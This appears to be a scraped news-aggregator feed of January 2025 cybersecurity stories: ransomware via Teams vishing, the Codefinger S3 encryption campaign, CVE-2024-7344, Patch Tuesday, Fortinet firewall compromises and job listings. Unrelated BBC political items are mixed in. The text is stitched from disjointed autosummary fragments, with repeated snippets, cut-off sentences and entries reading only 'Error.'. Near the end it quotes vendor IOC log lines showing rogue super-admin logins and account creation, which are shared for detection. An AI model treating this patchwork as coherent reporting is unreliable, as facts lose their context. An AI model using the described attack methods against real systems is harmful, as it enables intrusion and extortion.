Once access was established, the attacker used a web browser to download a malicious payload, which was split into parts, reassembled, and unpacked to deploy malware.Two ransomware groups abuse Microsoft’s Office 365 platform to gain access to target organizations Pierluigi Paganini January 22, 2025 January 22, 2025 Two ransomware groups exploiting Microsoft 365 services and default settings to target internal enterprise users. "Autosummary:
Deportees seen at the US-Mexico border in Tijuana on 21 January An executive action, posted to the White House"s website, argues that the measures are necessary to prevent undocumented immigrants from entering the US, "invading" US communities and "imposing billions of dollars of costs" on state and local governments. "Autosummary:
Yes, Minister character is government"s new AI assistant BBC Sir Humphrey Appleby was played by Sir Nigel Hawthorne in Yes, Minister Government workers will soon be given access to a set of tools powered by artificial intelligence (AI), named after a scheming parliamentary official from the classic sitcom Yes, Minister. "CISO Sempra Infrastructure | USA | Hybrid – View job details As a CISO, you will develop and implement a robust information security strategy and program that aligns with the organization’s objectives and regulatory requirements. Assess and manage cybersecurity risks across the organization’s digital infrastructure, networks, and sensitive data. Implement risk mitigation strategies and ensure regular risk assessments and audits. Cloud Security Engineer UBX | Philippines | On-site – View job details As a Cloud … More
The post Cybersecurity jobs available right now: January 21, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Privacy Engineer – Incident Response, Devices & Services Trust & Privacy (DSTP) Amazon | USA | On-site – View job details As a Senior Privacy Engineer – Incident Response, Devices & Services Trust & Privacy (DSTP), you will own and support the design, development, implementation, and maintenance of DSTS’ privacy incident response infrastructure, tools, and processes. Senior Cybersecurity Specialist AVIO | Italy | Hybrid – View job details As a Senior Cybersecurity Specialist, you will analyze and identify cybersecurity threats, assess their severity, design and implement security solutions to protect IT systems and data, manage the security and protection of company data by securing applications and databases and ensuring systems are always up to date, and ensure that the company complies with standards, best practices, and internal policies related to IT security. Cyber Security Engineer IAG | New Zealand | Hybrid – View job details As a Cyber Security Engineer, you will develop and maintain attack emulation, detection, and response methodologies, create automations and API integrations using ServiceNow, and lead CTED BAU uplift activities within scope, time, and quality. Software Security Engineer Allego | France | Remote – View job details As a Software Security Engineer, you will be responsible for designing and updating the overall cybersecurity strategy, managing security improvement projects, overseeing the security testing strategy (including vulnerability scanning and penetration testing), performing regular threat analyses to stay updated on the current security landscape, and ensuring compliance with applicable laws and regulations. "We’ve entered a new era where verification must come before trust, and for good reason. Cyber threats are evolving rapidly, and one of the trends getting a fresh reboot in 2025 is the “scam yourself” attacks. These aren’t your run-of-the-mill phishing scams. They are a sophisticated evolution of social engineering designed to deceive even the most tech-savvy users. Attackers exploit our routines, trust, and overconfidence, and complacency to manipulate us into becoming unwitting accomplices in … More
The post Scam Yourself attacks: How social engineering is evolving appeared first on Help Net Security.
"Autosummary:
The psychology behind the scam These scams are purposefully designed around deeply ingrained psychological tendencies: Default bias: We often stick to the default action such as just clicking “OK” or accepting pre-filled options, without questioning it.Often, the most effective defenses lie in returning to foundationally sound practices, leveraging security principles, disciplined processes, and fostering a culture of healthy skepticism. Additionally, adopting checklists for critical tasks, much like in engineering disciplines, helps reduce impulsive decisions and ensures systematic verification. "Autosummary:
"Autosummary:
"In 2024, the most active cyber threat clusters were UAC-0010, UAC-0050, and UAC-0006, specializing in cyber espionage, financial theft, and information-psychological operations," the SSSCIP said. "The “email bombing + posing as tech support via Microsoft Teams” combination is proving fruitful for two threat actors looking to deliver ransomware to organizations, and they seem to be ramping up their efforts. “Sophos MDR has observed more than 15 incidents involving these tactics in the past three months, with half of them in the past two weeks,” the company’s incident responders have warned today. The threat actors are social-engineering their way in To … More
The post Ransomware attackers are “vishing” organizations via Microsoft Teams appeared first on Help Net Security.
"Autosummary:
Their advice for cybersecurity defenders includes: Preventing or limiting which outside organizations can reached out to employees via M365 (i.e., Teams) Setting up policies to make sure that remote access applications can only be installed by the organization’s tech support team Setting up monitoring of potentially malicious inbound Teams or Outlook traffic Raisong employee awareness of the outlined tactics. "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
The largest proportion of Medusa"s targets appear to be located in the United States, followed by the United Kingdom, Canada, Australia, France, and Italy. Image In addition to the dark web leak site, accessible via Tor, Medusa also publicises hacks and publishes stolen data on its public Telegram channel.It"s noticeable that organisations based in Belarus, Kazakhstan, Kyrgyzstan, Russia, and Tajikistan do not appear in the list of victims. "Autosummary:
The DDoS activity has been found to single out telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. "Autosummary:
"Regardless of how they"ve been compromised, it seems as though the actor has been placing a script onto the [Mikrotik] devices that enables SOCKS (Secure Sockets), which allow the devices to operate as TCP redirectors," Brunsdon said. "Autosummary:
"Autosummary:
Fake Homebrew site Source: @ryanchenkie Security researcher JAMESWT found that the malware dropped in this case [VirusTotal] is Amos, a powerful infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and data stored on web browsers. "Autosummary:
For instance, in June, Microsoft addressed a Mark of the Web security bypass vulnerability (CVE-2024-38213) that DarkGate malware operators have exploited in the wild as a zero-day since March 2024 to circumvent SmartScreen protection and install malware camouflaged as installers for Apple iTunes, NVIDIA, Notion, and other legitimate software. "Autosummary:
"Autosummary:
Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code execution Pierluigi Paganini January 20, 2025 January 20, 2025 Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. "Attacks happen frequently on the security stack or within an enterprise. Often, they’re carried out by some unknown entity on the other side of the globe. You don’t know who you’re dealing with. You don’t know who they are. In this Help Net Security video, Jerry Mancini, NETSCOUT’s Senior Director, Office of the Enterprise CTO, discusses NDR’s role in a modern cybersecurity stack.
The post NDR’s role in a modern cybersecurity stack appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" DoNot Team, also tracked as APT-C-35, Origami Elephant, SECTOR02, and Viceroy Tiger, is a hacking group believed to be of Indian origin, with historical attacks leveraging spear-phishing emails and Android malware families to gather information of interest. "Autosummary:
This week"s list includes — CVE-2025-21333, CVE-2025-21334, CVE-2025-21335 (Windows Hyper-V NT Kernel Integration VSP), CVE-2024-55591 (Fortinet), CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, CVE-2024-13159 (Ivanti Endpoint Manager), CVE-2024-7344 (Howyar Taiwan), CVE-2024-52320, CVE-2024-48871 (Planet Technology WGS-804HPT industrial switch), CVE-2024-12084 (Rsync), CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 (SimpleHelp), CVE-2024-44243 (Apple macOS), CVE-2024-9042 (Kubernetes), CVE-2024-12365 (W3 Total Cache plugin), CVE-2025-23013 (Yubico), CVE-2024-57579, CVE-2024-57580, CVE-2024-57581, CVE-2024-57582 (Tenda AC18), CVE-2024-57011, CVE-2024-57012, CVE-2024-57013, CVE-2024-57014, CVE-2024-57015, CVE-2024-57016, CVE-2024-57017, CVE-2024-57018, CVE-2024-57019, CVE-2024-57020, CVE-2024-57021, CVE-2024-57022, CVE-2024-57023, CVE-2024-57024, CVE-2024-57025 (TOTOLINK X5000R), CVE-2025-22785 (ComMotion Course Booking System plugin), and 44 vulnerabilities in Wavlink AC3000 routers. 🔒 Tip of the Week Monitor, Detect, and Control Access with Free Solutions — In today"s complex threat landscape, advanced, cost-effective solutions like Wazuh and LAPS offer powerful defenses for small-to-medium enterprises.Wazuh, an open-source SIEM platform, integrates with the Elastic Stack for real-time threat detection, anomaly monitoring, and log analysis, enabling you to spot malicious activities early. 🔧 Cybersecurity Tools AD-ThreatHunting: Detect and stop threats like password sprays, brute force attacks, and admin misuse with real-time alerts, pattern recognition, and smart analysis tools.Together, these tools provide a robust, multi-layered defense strategy, giving you the ability to detect, respond to, and mitigate threats efficiently without the high cost of enterprise solutions.It supports scanning installed packages, binaries, and source code across Linux, Windows, and Mac, while also generating SBOMs in SPDX and CycloneDX formats.The phishing kit is also called WikiKit owing to the fact that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page.The phishing kit is also called WikiKit owing to the fact that site visitors whose IP address originates from a data center, cloud provider, bot, proxy, or VPN are directed to a Microsoft-related Wikipedia page. "Autosummary:
"Autosummary:
The Donot Team (aka APT-C-35 and Origami Elephant) has been active since 2016, it focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. Configuration files for 15,000 Fortinet firewalls leaked. Are yours among them? A threat actor has leaked … More
The post Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leaked appeared first on Help Net Security.
"Autosummary:
Balancing usability and security in the fight against identity-based attacks In this Help Net Security interview, Adam Bateman, CEO of Push Security, talks about the rise in identity-based attacks, how they’re becoming more sophisticated each year, and how AI and ML are both fueling these threats and helping to defend against them.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. "Autosummary:
"In some communities in the region, food shortages are beginning to be reported, affecting local communities," the Ombudsman"s Office wrote in a statement on Saturday, adding that thousands of people are believed to have been displaced by the violence. "Autosummary:
"Autosummary:
"Autosummary:
Earlier this week, Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), said "China"s sophisticated and well-resourced cyber program represents the most serious and significant cyber threat to our nation, and in particular, U.S. critical infrastructure. "Autosummary:
One creator, Nicole Bloomgarden, told the BBC not being on TikTok would amount to a significant salary cut, while another, Erika Thompson, said the educational content on the platform would be the "biggest loss" for the community.TikTok says it will "go dark" on Sunday without US government action Watch: TikTokers" say goodbye to their "Chinese spy" as they move to RedNote TikTok has said it will be forced to "go dark" in the US on Sunday unless the government intervenes before a ban takes effect. "Autosummary:
U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt Typhoon Pierluigi Paganini January 18, 2025 January 18, 2025 The U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. "Autosummary:
U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt Typhoon Pierluigi Paganini January 18, 2025 January 18, 2025 The U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. "The Commission has presented an EU action plan aimed at strengthening the cybersecurity of hospitals and healthcare providers. The initiative is an essential step in shielding the healthcare sector from cyber threats. Digitalization is revolutionizing healthcare, enabling better patient services through innovations such as electronic health records, telemedicine, and AI-driven diagnostics. However, cyberattacks can delay medical procedures, create gridlock in emergency rooms, and disrupt vital services, which, in severe cases, could directly impact the lives … More
The post EU takes decisive action on healthcare cybersecurity appeared first on Help Net Security.
"Autosummary:
The action plan proposes, among others, for ENISA, the EU agency for cybersecurity, to establish a pan-European Cybersecurity Support Centre for hospitals and healthcare providers, providing them with tailored guidance, tools, services, and training.However, cyberattacks can delay medical procedures, create gridlock in emergency rooms, and disrupt vital services, which, in severe cases, could directly impact the lives of Europeans. "Autosummary:
" "While User-Agent transitions occasionally happen in legitimate situations (e.g., authentication initiated in desktop applications that launch a web browser or WebView to handle MFA), the specific sequence of User-Agents used by Sneaky 2FA does not correspond to a realistic scenario, and offers a high-fidelity detection of the kit." "Star Blizzard, a threat actor tied to the Russian Federal Security Service (FSB), was spotted attempting to compromise targets’ WhatsApp accounts through a clever phishing campaign. The campaign The campaign started with a spear-phishing email that was made to look like it was sent by a US government official. “We have established a private WhatsApp group to facilitate discussions regarding the latest non-govermental initiatives aimed at supporting Ukraine. This platform will also serve as a … More
The post How Russian hackers went after NGOs’ WhatsApp accounts appeared first on Help Net Security.
"Autosummary:
The spoofed WhatsApp page, with the QR code obscured (Source: Microsoft Threat Intelligence) “However, this QR code is actually used by WhatsApp to connect an account to a linked device and/or the WhatsApp Web portal,” Microsoft’s threat analysts explained. "Autosummary:
"Autosummary:
"Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA Known Exploited Vulnerabilities catalog) Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Aviatrix Controller) "Autosummary:
Last week, the Treasury announced that the operation was conducted by “Silk Typhoon” (a.k.a. Hafnium), a team of skilled cyberspies who target a broad range of organizations in the U.S., Japan, Australia, and Vietnam. "Autosummary:
Anne Neuberger, the White House"s deputy national security adviser for cyber and emerging technologies, told reporters that the hackers breached nine U.S. carriers (including Windstream, Charter, and Consolidated Communications) and telecom companies in dozens of other countries. "Autosummary:
With that access the group can read the messages in their WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web. How to stay safe These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. "Autosummary:
" Otelier, previously known as MyDigitalOffice, is a cloud-based hotel management solution used by over 10,000 hotels worldwide to manage reservations, transactions, nightly reports, and invoicing. "Once we were made aware of this incident involving Otelier, we immediately contacted the vendor, which works with numerous hotel companies, and confirmed that they were working with cyber security experts to investigate a security incident that impacted their systems," a Marriott spokesperson told BleepingComputer. "Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA Known Exploited Vulnerabilities catalog) Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Aviatrix Controller) "Autosummary:
"Autosummary:
"Ross Young is the CISO in residence at Team8 and the creator of the OWASP Threat and Safeguard Matrix (TaSM). In this interview, he shares his perspective on how cybersecurity professionals can tailor their presentations to the board, aligning security strategies with business priorities. He also discusses common misconceptions that boards have about cybersecurity and offers practical advice on building lasting relationships with executives to ensure cybersecurity stays front and center in ongoing business discussions. … More
The post How CISOs can elevate cybersecurity in boardroom discussions appeared first on Help Net Security.
"Autosummary:
While investment is important, organizations need coordinated effort between operational management (first line), risk management functions (second line), and internal audit (third line) to create an effective security posture.While the security team typically operates in the second line of defense alongside risk management and compliance functions, primary responsibility for security begins with first-line operational teams, particularly developers securing their applications.The first line of defense, including developers and operational staff, must actively implement security practices in their daily work, regardless of certification status. "Autosummary:
As highlighted by Halcyon earlier this month, some of the other tools deployed prior to ransomware deployment include those responsible for - Disabling Endpoint Detection and Response (EDR) solutions using EDRSilencer and Backstab Stealing credentials using LaZagne Compromising email accounts by brute-forcing credentials using MailBruter Maintaining stealthy access and delivering additional payloads using Sirefef and Mediyes Ransomware campaigns have also been observed targeting Amazon S3 buckets by leveraging Amazon Web Services" Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt victim data. "Autosummary:
US Attorney Jacqueline Romero for the Eastern District of Pennsylvania commented: “This wide-ranging hack and long-term infection of thousands of Windows-based computers, including many home computers in the United States, demonstrates the recklessness and aggressiveness of PRC state-sponsored hackers.” "Autosummary:
"ESET researchers have identified a vulnerability (CVE-2024-7344) impacting most UEFI-based systems, which allows attackers to bypass UEFI Secure Boot. The issue was found in a UEFI application signed with Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party certificate. Exploiting this vulnerability enables the execution of untrusted code during system boot, allowing attackers to deploy malicious UEFI bootkits, such as Bootkitty or BlackLotus, even on systems with UEFI Secure Boot enabled, regardless of the operating system. Impacted … More
The post New UEFI Secure Boot bypass vulnerability discovered (CVE-2024-7344) appeared first on Help Net Security.
"Autosummary:
List of vulnerable software products: Howyar SysReturn before version 10.2.023_20240919 Greenware GreenGuard before version 10.2.023-20240927 Radix SmartRecovery before version 11.2.023-20240927 Sanfong EZ-back System before version 10.3.024-20241127 WASAY eRecoveryRX before version 8.4.022-20241127 CES NeoImpact before version 10.1.024-20241127 SignalComputer HDD King before version 10.3.021-20241127 “The number of UEFI vulnerabilities discovered in recent years and the failures in patching them or revoking vulnerable binaries within a reasonable time window shows that even such an essential feature as UEFI Secure Boot should not be considered an impenetrable barrier,” says ESET researcher Martin Smolár, who discovered the vulnerability. "Cisco announced Cisco AI Defense, a pioneering solution to enable and safeguard AI transformation within enterprises. As AI technology advances, new safety concerns and security threats are emerging at an unprecedented speed which existing security solutions are unprepared to protect against. Cisco AI Defense is purpose-built for enterprises to develop, deploy and secure AI applications with confidence. “Business and technology leaders can’t afford to sacrifice safety for speed when embracing AI,” said Jeetu Patel, EVP and … More
The post Cisco AI Defense safeguards against the misuse of AI tools appeared first on Help Net Security.
"Autosummary:
Accuracy and trustworthiness are essential for protecting enterprise AI applications, and Cisco has been actively involved in developing AI security industry standards, including those from MITRE, OWASP, and NIST.AI Defense integrates seamlessly with existing data flows for unparalleled visibility and control and is built into the Security Cloud, Cisco’s unified, AI-driven, cross-domain security platform. Securing access to AI applications: As end users rush to adopt AI applications like summarization tools to improve their productivity, security teams need to prevent data leakage and the poisoning of proprietary data. "IT-Harvest launched HarvestIQ.ai, a platform featuring two AI assistants designed to redefine how professionals navigate the cybersecurity landscape. The Analyst AI provides access to IT-Harvest’s comprehensive database of 4,070 cybersecurity vendors, offering users instant insights into market players, trends, and innovations. Meanwhile, the Architect AI empowers users with tailored guidance on cybersecurity products, leveraging IT-Harvest’s in-depth analysis of over 11,300 products to help organizations make informed decisions about their cybersecurity strategies. “HarvestIQ.ai is a game-changer … More
The post HarvestIQ.ai provides actionable insights for cybersecurity professionals appeared first on Help Net Security.
"Autosummary:
Error. "Autosummary:
MikroTik botnet relies on DNS misconfiguration to spread malware Pierluigi Paganini January 16, 2025 January 16, 2025 Researchers discovered a 13,000-device MikroTik botnet exploiting DNS flaws to spoof 20,000 domains and deliver malware. "Autosummary:
The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH - Howyar SysReturn before version 10.2.023_20240919 Greenware GreenGuard before version 10.2.023-20240927 Radix SmartRecovery before version 11.2.023-20240927 Sanfong EZ-back System before version 10.3.024-20241127 WASAY eRecoveryRX before version 8.4.022-20241127 CES NeoImpact before version 10.1.024-20241127 SignalComputer HDD King before version 10.3.021-20241127 "The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage," ESET researcher Martin Smolár said. "Autosummary:
Specifically, it leverages a data structure called NETLOGON_LOGON_IDENTITY_INFO, which contains a field named ParameterControl that, in turn, has a configuration to "Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed. "Autosummary:
"In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report for Q3 2024 shared with The Hacker News. "Autosummary:
Earlier, Trump"s choice for national security adviser, Mike Waltz, had said on Fox News that "anything they [the Biden administration] are doing right now, we can do back, and no one should be under any illusion in terms of a change in Cuba policy". "Autosummary:
"Autosummary:
Although the law firm says it has no evidence the exposed data has been misused, it warns impacted individuals that hackers may be holding the following information about them: Full name Social Security number (SSN) Employee Identification number Medical diagnosis Medical claim information Exposure of this data steeply increases the risk of phishing, scams, social engineering, and other targeted attacks on impacted individuals. "Autosummary:
Active since at least 2012, it"s also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057. "Autosummary:
Clop Ransomware exploits Cleo File Transfer flaw: dozens of claims, disputed breaches Pierluigi Paganini January 16, 2025 January 16, 2025 The Clop ransomware gang claims dozens of victims from a Cleo file transfer vulnerability, though several companies dispute the breaches. "Autosummary:
Its expertise spans securities litigation, addressing corporate fraud and misrepresentation; antitrust law, targeting anti-competitive practices; consumer protection, focusing on deceptive practices and product liability; data privacy and cybersecurity, dealing with breaches and unauthorized data collection; and shareholder derivative actions, advocating for shareholders against corporate mismanagement. "Autosummary:
Its expertise spans securities litigation, addressing corporate fraud and misrepresentation; antitrust law, targeting anti-competitive practices; consumer protection, focusing on deceptive practices and product liability; data privacy and cybersecurity, dealing with breaches and unauthorized data collection; and shareholder derivative actions, advocating for shareholders against corporate mismanagement. "Autosummary:
Clop Ransomware exploits Cleo File Transfer flaw: dozens of claims, disputed breaches Pierluigi Paganini January 16, 2025 January 16, 2025 The Clop ransomware gang claims dozens of victims from a Cleo file transfer vulnerability, though several companies dispute the breaches. "Autosummary:
Error. "Autosummary:
"Cybersecurity is entering a new era of complexity, according to the World Economic Forum’s Global Cybersecurity Outlook 2025 report. Growing complexity intensifies cyber inequity This complexity arises from the rapid growth of emerging technologies, prevailing geopolitical uncertainty, the evolution of threats, regulatory challenges, vulnerabilities in supply chain interdependencies and the growing cyber skills gap. Growing complexity further intensifies cyber inequity, deepening the divide between developed and emerging economies, expanding sectoral disparities, and widening the gap … More
The post Cybersecurity is stepping into a new era of complexity appeared first on Help Net Security.
"Autosummary:
Growing complexity intensifies cyber inequity This complexity arises from the rapid growth of emerging technologies, prevailing geopolitical uncertainty, the evolution of threats, regulatory challenges, vulnerabilities in supply chain interdependencies and the growing cyber skills gap. "Autosummary:
"Autosummary:
Separately, Redmond has warned that five of the bugs are publicly known - CVE-2025-21186, CVE-2025-21366, CVE-2025-21395 (CVSS scores: 7.8) - Microsoft Access Remote Code Execution Vulnerability CVE-2025-21275 (CVSS score: 7.8) - Windows App Package Installer Elevation of Privilege Vulnerability CVE-2025-21308 (CVSS score: 6.5) - Windows Themes Spoofing Vulnerability It"s worth noting that CVE-2025-21308, which could lead to improper disclosure of an NTLM hash, was previously flagged by 0patch as a bypass for CVE-2024-38030. The update is also notable for closing out five Critical severity flaws - CVE-2025-21294 (CVSS score: 8.1) - Microsoft Digest Authentication Remote Code Execution Vulnerability CVE-2025-21295 (CVSS score: 8.1) - SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability CVE-2025-21298 (CVSS score: 9.8) - Windows Object Linking and Embedding (OLE) "Autosummary:
“As described by Csaba Fitzl of Kandji in POC2024, upon mounting, the disk utility consults a specialized daemon known as the Storage Kit daemon (storagekitd), which, in turn, uses the Disk Arbitration daemon (diskarbitrationd) to invoke the right mount process via posix_spawn.” concludes Microsoft. “Bypassing SIP could lead to serious consequences, such as increasing the potential for attackers and malware authors to successfully install rootkits, create persistent malware, bypass Transparency, Consent and Control (TCC), and expand the attack surface for additional techniques and exploits.” "The Justice Department announced on Tuesday that, alongside international partners, the FBI deleted “PlugX” malware from thousands of infected computers worldwide. As described in court documents unsealed in the Eastern District of Pennsylvania, a group of hackers sponsored by the People’s Republic of China (PRC), known to the private sector as “Mustang Panda” and “Twill Typhoon,” used a version of PlugX malware to infect, control, and steal information from victim computers. According to court documents, … More
The post FBI removed PlugX malware from U.S. computers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The advanced persistent threat groups affiliated with the DPRK, including the Lazarus Group, [...] continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime campaigns to steal cryptocurrency and targeting exchanges, digital asset custodians, and individual users," the governments said. "Autosummary:
For example, mature organizations cite the main benefits of this control in the following areas as directly contributing to safety and engineering across: Safe, passive industrial traffic analysis to identify engineering assets to build an ICS/OT asset inventory Engineering troubleshooting capabilities Safe, passive industrial traffic analysis to identify engineering system vulnerabilities Industrial and engineering-driven specific incident response capabilities Meeting compliance requirements Strategic Realignment Opportunities It is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business – the engineering and operating technology systems.ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies, and controls. "Autosummary:
"Autosummary:
The Codefinger ransomware campaign targeting AWS SSE-C encryption is highly dangerous due to irreversible data loss without the attacker’s key, limited forensic evidence in AWS CloudTrail logs, and the potential to significantly disrupt critical data storage on Amazon S3 Organizations are recommended to protect themselves by hardening AWS environments: restrict SSE-C usage with IAM policies, monitor and audit AWS keys, enable detailed S3 logging, and collaborate with AWS support.Then they start the encryption by The threat actor looks for keys with permissions to write and read S3 objects (s3:GetObject and s3:PutObject requests), and then launches the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header. "Autosummary:
More than three years later, in December 2024, Redmond made it abundantly clear that TPM 2.0 support is a "non-negotiable" requirement, as customers won"t be able to upgrade to Windows 11 without it. "Autosummary:
" The disclosure comes as Trend Micro revealed that attackers are using platforms such as YouTube and SoundCloud to distribute links to fake installers for pirated versions of popular software that ultimately lead to the deployment of various malware families such as Amadey, Lumma Stealer, Mars Stealer, Penguish, PrivateLoader, and Vidar Stealer. "Autosummary:
"This essentially defeats the purpose of having an SPF record, because it opens the door for spoofing and unauthorized email sending" - Infoblox A safer choice is using the "-all" option, which limits email sending to the servers specified by the domain. "Autosummary:
Microsoft Patch Tuesday security updates for January 2025 addressed 161 vulnerabilities in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and Windows Virtual Trusted Platform Module. "Autosummary:
Microsoft Patch Tuesday security updates for January 2025 addressed 161 vulnerabilities in Windows and Windows Components, Office and Office Components, Hyper-V, SharePoint Server, .NET and Visual Studio, Azure, BitLocker, Remote Desktop Services, and Windows Virtual Trusted Platform Module. "In this Help Net Security interview, Nuno Martins da Silveira Teodoro, VP of Group Cybersecurity at Solaris, discusses the latest advancements in digital banking security. He talks about how AI and ML are reshaping fraud detection, the growing trend of passwordless authentication, and the security risks facing mobile banking apps. Nuno also discusses the balance between ensuring security and providing a seamless, user-friendly experience for customers.
The post How AI and ML are transforming digital banking security appeared first on Help Net Security.
"Autosummary:
Traditional passwords are being replaced with more secure and user-friendly methods, such as biometrics (fingerprints, facial recognition), hardware tokens or behavioral authentication leveraging unique user characteristics or devices to verify identity, reducing reliance on passwords, which are prone to theft, reuse, and phishing attacks.For example, low-risk activities like balance checks might require only basic authentication, while high-risk actions, such as large transfers, prompt multi-factor authentication. By combining advanced technologies, proactive monitoring, and user education, banks can significantly reduce risks and ensure the safety of their mobile banking platforms, maintaining trust in an increasingly digital-first world. Last but not least, banks should also invest in AI-driven fraud driven capabilities in the end user’s devices to allow safe and frictionless online customer journeys by integrating industry-leading threat intel, behavioral analytics, advanced device fingerprinting with adaptive fraud indicators to monitor for anomalies in real-time and promptly address threats. "Application Security DevOps engineer Twixor | India | On-site – View job details As an Application Security DevOps engineer, you will implement and oversee application security measures to protect company’s software and infrastructure. Conduct regular security assessments and vulnerability testing. Develop and maintain secure coding practices and standards. Design, implement, and maintain secure CI/CD pipelines. Perform threat modeling and risk assessments. CISO Degroof Petercam | Belgium | Hybrid – View job details As a CISO, … More
The post Cybersecurity jobs available right now: January 14, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Security Engineer, Offensive Security VXI Global Solutions | USA | Hybrid – View job details As a Senior Security Engineer, Offensive Security, you will manage complete red team exercises, drive security improvement across the organization, research emerging attack vectors, vulnerabilities and techniques. Cloud Security Engineer (Azure) Tech Mahindra | UAE | On-site – View job details As a Cloud Security Engineer (Azure), you will implement and configure cloud security controls and policies, manage access to data, and monitor threats to ensure that apps, containers, infrastructure, and networks are protected.Perform full, detailed security risk assessments and penetration tests on a wide variety of high or critical business solutions that include but are not limited to software, hardware, networks, and mobile devices as well as complex solutions that may include any number of the above configurations Security Researcher Lasso Security | Israel | On-site – View job details As a Security Researcher, you will design and lead technical security research in the field of LLMs. Cybersecurity Engineer, Resilience Electrolux Group | Czechia | On-site – View job details As a Cybersecurity Engineer, Resilience, you will perform risk assessment tests and audits of connected systems for cybersecurity issues, identify security vulnerabilities in digital products, applications, systems and infrastructure and drive their mitigation. "Autosummary:
" The digital break-ins, in a nutshell, involved the attackers logging in to the firewall management interfaces to make configuration changes, including modifying the output setting from "standard" to "more," as part of early reconnaissance efforts, before making more extensive changes to create new super admin accounts at the start of December 2024. "Autosummary:
It"s also known as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. "Autosummary:
Threat actors exploit Aviatrix Controller flaw to deploy backdoors and cryptocurrency miners Pierluigi Paganini January 14, 2025 January 14, 2025 A critical vulnerability in Aviatrix Controller is actively exploited to deploy backdoors and cryptocurrency miners in the wild. "Autosummary:
Fortinet and Arctic Wolf shared almost identical IOCs, stating that you can examine logs for the following entries to determine if devices were targeted: Following login activity log with random scrip and dstip: type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" sn="1733486785" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole" Following admin creation log with seemingly randomly generated user name and source IP: type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgtid=1411317760 cfgpath="system.admin" cfgobj="vOcep" cfgattr="password[*]accprofile[super_admin]vdom[root]" msg="Add system.admin vOcep" The security companies also warned that the attackers commonly used the following IP addresses in attacks: 1.1.1.1 127.0.0.1 2.2.2.2 8.8.8.8 8.8.4.4 Arctic Wolf says it notified Fortinet about the attacks on December 12, 2024, and received confirmation from FortiGuard Labs PSIRT on December 17, 2024, that this activity was known and was already under investigation. "Autosummary:
